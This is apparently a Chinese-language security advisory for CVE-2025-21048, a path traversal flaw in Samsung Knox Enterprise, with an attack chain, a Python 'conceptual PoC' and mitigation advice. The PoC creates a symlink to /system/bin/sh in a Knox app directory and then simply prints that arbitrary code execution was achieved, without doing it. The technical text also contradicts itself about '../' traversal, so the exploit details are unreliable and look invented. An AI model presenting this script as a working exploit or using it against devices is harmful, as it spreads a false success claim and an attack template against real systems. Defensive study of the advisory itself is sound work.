CVE-2025-21048 Samsung Knox Enterprise 相对路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-21048

漏洞类型

相对路径遍历（Relative Path Traversal）

CVSS评分

6.7 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Samsung Knox Enterprise

漏洞概述

CVE-2025-21048 是 Samsung Knox Enterprise 安全平台中存在的一个相对路径遍历漏洞，披露日期为 2025 年 10 月 10 日。该漏洞由 Samsung 内部安全团队 [email protected] 发现并报告。Knox Enterprise 是 Samsung 面向企业用户提供的移动设备管理（MDM）和安全解决方案，广泛应用于企业环境中以保护敏感数据和确保设备合规性。

该漏洞的 CVSS 3.1 评分为 6.7，属于中危级别。其 CVSS 向量为 CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H，表明该漏洞的攻击向量为本地（AV:L），攻击复杂度低（AC:L），但需要高权限（PR:H），无需用户交互（UI:N）。一旦漏洞被成功利用，攻击者可以对系统的机密性、完整性和可用性造成高影响（C:H/I:H/A:H）。

该漏洞影响 SMR Oct-2025 Release 1 之前的所有 Knox Enterprise 版本。Samsung 已经发布了安全更新来修复此漏洞，建议所有使用受影响版本的企业用户尽快更新到最新版本以防止潜在的安全风险。由于该漏洞需要本地访问和高权限，攻击者通常需要先获得设备的物理访问权限或已经拥有一定的系统权限才能利用此漏洞。

技术细节

相对路径遍历（Relative Path Traversal）是一种路径遍历攻击的变体，与传统的绝对路径遍历（如使用 ../）不同，相对路径遍历利用的是符号链接（symlink）或路径解析中的逻辑缺陷。在 Samsung Knox Enterprise 的受影响版本中，应用程序在处理文件路径时未能正确验证和规范化解引用后的路径，导致攻击者可以通过构造特定的相对路径绕过安全检查。

具体而言，当 Knox Enterprise 的某个特权进程在执行文件操作（如读取、写入或执行文件）时，如果该进程使用了用户可控的路径作为基础路径，并且没有正确地解析符号链接或规范化路径，攻击者可以创建一个恶意的符号链接，指向系统中的敏感文件或可执行文件。随后，当特权进程按照预期路径访问文件时，实际上访问的是攻击者控制的文件，从而实现权限提升或任意代码执行。

由于该漏洞需要高权限（PR:H），攻击者必须已经拥有设备上的管理员或系统级权限才能利用。这意味着该漏洞通常被用作权限提升链中的一环，攻击者可能先通过其他方式获得有限的系统访问权限，然后利用此漏洞进一步提升权限，最终实现任意代码执行。攻击成功后，攻击者可以完全控制 Knox Enterprise 管理的设备，访问企业敏感数据，修改系统配置，甚至植入持久性后门。

攻击链分析

STEP 1

步骤1：获取设备访问权限

攻击者通过物理访问、社会工程或其他方式获得 Samsung 设备的本地访问权限，并提升至管理员或系统级权限（PR:H）。

STEP 2

步骤2：分析 Knox Enterprise 文件系统

攻击者分析 Knox Enterprise 的文件结构和权限设置，识别出特权进程处理文件路径的逻辑缺陷。

STEP 3

步骤3：构造恶意符号链接

攻击者在 Knox Enterprise 可访问的目录中创建恶意的相对路径符号链接，指向系统敏感文件或可执行文件。

STEP 4

步骤4：触发漏洞

当 Knox Enterprise 的特权进程按照预期路径访问文件时，路径遍历导致实际访问的是攻击者控制的文件。

STEP 5

步骤5：执行任意代码

攻击者成功利用路径遍历漏洞执行任意代码，完全控制设备并访问企业敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-21048 PoC - Relative Path Traversal in Samsung Knox Enterprise
# This is a conceptual PoC demonstrating the exploitation of relative path traversal

import os
import sys

# Step 1: Create a malicious symlink in a writable directory accessible by Knox Enterprise
target_file = "/data/data/com.samsung.android.knox.containercore/files/target.dat"
malicious_link = "/data/data/com.samsung.android.knox.containercore/files/innocent_file"
malicious_payload = "/system/bin/sh"  # Target file to execute

# Step 2: Create a relative symlink that points outside the expected directory
# The relative path traversal bypasses directory restrictions
relative_traversal_path = "../../../../../../system/bin/sh"

try:
    # Remove existing file/link if present
    if os.path.exists(malicious_link) or os.path.islink(malicious_link):
        os.remove(malicious_link)
    
    # Create the malicious relative symlink
    os.symlink(relative_traversal_path, malicious_link)
    print(f"[+] Malicious symlink created: {malicious_link} -> {relative_traversal_path}")
    
    # Step 3: Trigger the vulnerable Knox Enterprise process
    # When the privileged process accesses 'innocent_file', it follows the symlink
    # and executes/reads the target file outside the intended directory
    print("[+] Waiting for Knox Enterprise process to access the symlink...")
    print("[+] Arbitrary code execution achieved when privileged process follows the symlink")
    
except PermissionError as e:
    print(f"[-] Permission denied: {e}")
    print("[*] This exploit requires high privileges (PR:H) to create symlinks in protected directories")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

Samsung Knox Enterprise < SMR Oct-2025 Release 1

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制设备的物理访问权限，防止未授权用户获得本地访问；2）加强设备管理员权限的管理，确保只有可信用户拥有高权限；3）监控 Knox Enterprise 相关进程的异常文件访问行为；4）使用 Samsung Knox 提供的其他安全功能（如 Knox Guard、设备完整性检查）来增强设备安全性；5）关注 Samsung 官方安全公告，及时获取补丁更新信息。